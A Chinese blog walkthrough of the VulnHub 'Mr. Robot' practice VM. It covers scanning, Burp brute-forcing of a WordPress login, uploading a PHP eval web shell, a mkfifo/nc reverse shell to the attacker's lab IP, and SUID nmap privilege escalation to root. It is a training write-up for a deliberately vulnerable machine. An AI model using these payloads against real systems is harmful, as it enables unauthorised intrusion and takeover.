vulnhub靶场渗透mrrobot漏洞复现

最新推荐文章于 2024-06-07 17:47:13 发布
最新推荐文章于 2024-06-07 17:47:13 发布
阅读量770 收藏 4
点赞数 2
分类专栏: vunlnhub靶场漏洞复现 文章标签: 安全 网络 web安全 网络安全 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61702710/article/details/131956330
版权

靶场下载地址:机器人先生: 1 ~ VulnHub

目录

靶场下载地址:机器人先生: 1 ~ VulnHub

1.内网渗透

2.端口扫描

3.扫描指纹

4.目录扫描

5.burp爆破

6.木马上传

7.反弹shell

8.find提权

9.总结

实验背景:此 VM 有三个密钥隐藏在不同的位置。你的目标是找到所有三个。每个钥匙都越来越难找到。

VM 并不太困难。没有任何高级利用或逆向工程。该级别被认为是初级 - 中级。

攻击机ip:192.168.179.131 kali

靶机ip:192.168.179.116 ubantu

目标:获取靶机上的flag

1.内网渗透

先利用namp扫描整个网段,找出靶机的IP为192.168.179.116

2.端口扫描

扫描所有开放的端口,找出的开放端口为80,22,443

image-20230726092617216

根据对应的端口,找到可能存在的漏洞

image-20230726092724103

3.扫描指纹

要下载插件扫描指纹信息,用kali自带的whatweb插件;

 whatweb 192.168.179.116

image-20230726092902073

4.目录扫描

通过dirb遍历一下其存在的站点

 dirb http://192.168.179.116 /usr/share/dirb/wordlists/big.txt

image-20230726093317758

看一下几个比较重要的站点,首先看到robots.txt,里面有flag1和一个字典

image-20230726111017785

访问flag1可以看到一串字符,看起来像是md5,尝试解密但解密失败

image-20230726111326341

访问fsocity.dic,可以下载文件,猜测是用户名或者是密码

image-20230726111702197

5.burp爆破

上面目录遍历中有一个登录站点http://192.168.179.116/wp-login,尝试利用上面的字典文件进行爆破

随便输入一个用户名,发现有错误的用户名认证,所以可以用burp依次爆破用户名和密码

image-20230726112954874

先爆破用户名,用上上面下载的

image-20230726113425687

爆出几个用户名

image-20230726162501668

再用用户名去暴密码,这里字体太多了,而且重复的也多的离谱,可以先进行文本去重,快了好多

image-20230726164221960

得出最终的用户名密码,去登录页面进行登录,登录成功

  • 用户名:elliot

  • 密码:ER28-0652

image-20230726164340249

6.木马上传

在页面找到一个模板可以自定义,上传一句话木马

 <?php
 @eval($_POST['code']);
 ?>

image-20230726171527880

用蚁剑进行远程连接

image-20230726174031614

7.反弹shell

在蚁剑的虚拟终端不好操作,反弹到kali进行操作

 rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.179.131 4444 >/tmp/f

在Kali上启动nc监听

 nc -lvp 4444

image-20230726180953981

image-20230726181056433

搞一个交互式环境好操作

 python -c 'import pty; pty.spawn("/bin/bash")'

image-20230726231425468

查看当前目录下的文件和当前用户,切换到robot用户下,发现了flag2和一个MD5加密的密码

image-20230726231633336

发现flag2不能查看,没有访问权限

image-20230726232107717

对MD5加密密码进行解密

image-20230726232150945

得到了robot用户的密码,进行登录,登录成功后得到了flag2

  • 用户名:robot

  • 密码:abcdefghijklmnopqrstuvwxyz

image-20230726233502143

8.find提权

查找可以利用的SUID 权限程序,可以找到 nmap,所以用 nmap 执行 root 权限

 find / -perm -u=s -type f 2>/dev/null

image-20230726232814144

使用nmap --interactive 进入命令行,然后输入!sh产生一个 root 权限的新shell,发现提权成功,查看当前目录,获得flag3,复现完成

image-20230726233256887

9.总结

  • nmap多种用法

  • burp,蚁剑等工具的使用

  • 反弹shell

  • find提权

网安小陈(小白)
关注
  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
robots.txt漏洞
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
11-16 4万+
robots.txt漏洞描述:搜索引擎可以通过robots文件可以获知哪些页面可以爬取,哪些页面不可以爬取。Robots协议是网站国际互联网界通行的道德规范,其目的是保护网站数据和敏感信息、确保用户个人信息和隐私不被侵犯,如果robots.txt文件编辑的太过详细,反而会泄露网站的敏感目录或者文件,比如网站后台路径,从而得知其使用的系统类型,从而有针对性地进行利用。 robots.txt漏洞测试方法: 1、一般用工具扫描即可例如:AWVS,工具爬虫扫描得到敏感文件的路径,从而找到rob
VulnHub--mrrobot
记录笔记
07-06 853
Vulnhub靶场--Mr robot 靶机
OSCP Mr. Robot 靶机渗透
Shadow的博客
03-12 1243
Mr. Robot 靶机渗透 目标:得到root权限 作者:shadow 时间:2021-03-12
Web应用安全测试-信息泄漏
最新发布
06-07 1411
Web应用安全测试-信息泄漏,列举常见漏洞描述、测试方法、风险等级级修复建议
Mr.Robot靶机 - 机器人先生
Ms08067安全实验室
03-02 2229
本文作者:恩格尔-src小组﹀﹀﹀靶机简介:靶机主题来自美剧《黑客军团》,这是一部传达极客精神和黑客文化的上佳作品,不同于《硅谷》的搞笑风格,这部剧的主角Eliot患有精神分裂,整部剧的...
看完这篇 教你玩转渗透测试靶机Vulnhub——Mr-Robot :1
Aluxian_的博客
10-23 677
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VMware或者Oracle VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。PS:需要获得root权限找到flagIntermediate(中级的)1.信息收集工具得使用2.CMS框架登入后 反弹shell3.nmap提权,md5解密🆗又是收获满满的一天最后创作不易,希望对大家有所帮助 喜欢的话麻烦大家给个一键三连 你的开心就是我最大的快乐!!
Mr-Robot: 1靶机
小小猪的博客
06-09 263
Mr-Robot: 1靶机 arp-scan -l 扫描靶机IP地址 nmap -sV -Pn -A x.x.x.233 dirb x.x.x.233 扫描出了robots.txt、readme、license.txt等敏感目录 查看robots.txt
Vulnhub系列-mrRobot
Yasso的博客
12-26 2466
靶机:192.168.12.129 kali: 192.168.12.128 一、信息收集 nmap -sV 192.168.12.129 –扫描开放端口 dirsearch -u http://192.168.12.129/ –扫下web目录 –robots.txt和wordpress登录框– 得到第一个key fsocity.dic打开是个字典,猜测可以用来爆破wordpress登录框 –bp抓包,fsocity当作字典–—80多万。。。。。。— 可以确定用户名是Elliot,那用户名不用爆了(
VulnHub-MrRobot靶机渗透记录
Ve99tr’s Blog
04-01 579
MrRobot是一个WEB方向的初学者-中级靶机,一共有三个Key,难度逐级增加,适合学习者了解渗透过程,积累渗透经验
mrRobot.ova
07-16
SHA256: 1B69E9D8139D27387ED0EED112146FA6277272D1622A789E3CFEFBC456ABFA4F
2020-11-16(综合渗透靶场(一))
wahhh123admin的博客
11-17 1217
**综合性靶场mrRobot(一 )** 标题&nmap信息收集& kail:192.168.99.17 靶机ip:nmap 192.168.99.0/24 得出ip为192.168.99.23 找到了ip,查看具体信息 nmap -A 192.168.99.23 结论:80端口是apache服务 靶机系统为Linux 查看又没有隐藏的端口 nmap -p- 192.168.99.23 没有隐藏端口 ...
渗透入门Mr-robott靶机练习.doc
07-09
一款入门级别靶机Mr-robot的练习思路
mrRobot-1靶场_wp
shajianlong666的博客
06-12 362
简单的一次靶场练习
tryhackme靶场: Mr Robot CTF
m0_64348326的博客
06-20 262
6.再来爆破出密码,这里字典太长且有很多数据重复,直接查看这部分的结果,在第八万多条的。8.根据选项面版RCE描述的方法,主题编辑器右侧找到404页面,添加。搭建的博客站登陆页面,根据登陆时的报错回显,利用下载的字典和。按照最新版的burp社区版爆破速度,估计要爆破到靶机结束。解密,但是还是得付费。需要收费,只能手动搜索了。,由于Linux系统的问题后面不需要再加。工具配合默认字典进行目录扫描,结果中的。7.进入后台后,准备查找历史漏洞,但是。命令,发现要输入密码,读取目录下的。命令开出bash命令窗。
看完这篇教你玩转靶机 MR-ROBOT: 1
清唪的博客
03-27 5208
Vulnhub介绍: Vulnhub 是一个漏洞靶场平台,里面含有大量的靶场镜像,只需要下载虚拟机镜像,导入 VMWare 或者 VirtualBox 即可启动靶场,同时它还提供了 Docker 镜像,可以使用 Docker 直接启动靶场,大大简化了渗透测试人员在搭建各种漏洞靶场时的步骤。 靶机下载: 官网:https://download.vulnhub.com/mrrobot/mrRobot.ovahttps://download.vulnhub.com/mrrobot/mrRobot.ova
Vulnhub靶机 MrRobot
菜浪马废的博客
04-14 268
arp-scan -l nmap -sV 192.168.0.143 主页是这个样子的 扫一下网站目录 dirb http://192.168.0.143 发现一个文件 拿到了第一个key 发现后台地址 访问了一下那个文件 拿到一个字典 拿到的字典文件太大 去重复化 重新生成一个字典 sort filename | uniq > filename 登录后台主页 找到...
vulnhub靶场,MR-ROBOT: 1
kukudeshuo的博客
12-16 800
vulnhub靶场,MR-ROBOT: 1 环境准备 靶机下载地址:https://www.vulnhub.com/entry/mr-robot-1,151/ 攻击机:kali(192.168.109.128) 靶机:MR-ROBOT: 1(192.168.109.190) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 目标:需要获取目标靶机的三个flag 信息收集 使用arp-scan确定目标靶机 使用nmap扫描查看目标靶机端口开
Mrrobot靶机渗透实战-vuluhub系列(六)
PANDA墨森的博客
07-04 608
这是vulnhub靶机系列文章的第六篇,本次主要知识点为:wordpress后台编辑模板getshell,suid提权-nmap命令,话不多说,直接开始吧... 靶机下载地址: https://www.vulnhub.com/entry/mr-robot-1,151/ #001 实验环境(nat模式) 攻击机:kali:192.168.136.129 靶机mrrobot:192.168.136.138 #002 实战writeup 寻找靶机ip,查找网卡中存活的主机,找到靶机ip:19...
靶场练习第七天~vulnhub靶场之mrRobot
qq_57976347的博客
02-01 1560
靶机下载链接: 百度网盘 请输入提取码 提取码: sqv3 一、主机发现 1.用ifconfig查看kali的ip,因为kali和靶机都开启了NAT模式,使用namp -sP 192.168.101.0/24探测靶机ip 二、信息收集 1.使用nmap扫描靶机 使用nmap -A 192.168.101.108 ,查看靶机开放的端口与服务。 2.使用dirb命令扫描靶机网站 用dirb命令扫描靶机网站,看看有没有隐藏的网址或者配置文件,具体使用方法:dirb http://192.16
Vulnhub靶场渗透-mrRobot
paidx0
09-21 987
前言 靶机ip(192.168.110.133) 攻击机ip(192.168.110.127) 网络NAT模式 直接开始 信息收集 漏洞挖掘 扫到的东西比较多,逐个看了一下,在robots.txt里找到第一个 flag,还发现一个字典 其次还找到 Wordpress的登录页 flag1 : 073403c8a58a1f80d943455fb30724b9 可以看看robots.txt里的字典内容,拿这个字典去爆破WordPress登录页 因为需要的时间比较长,就不再跑一边截图了,账号 elli
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值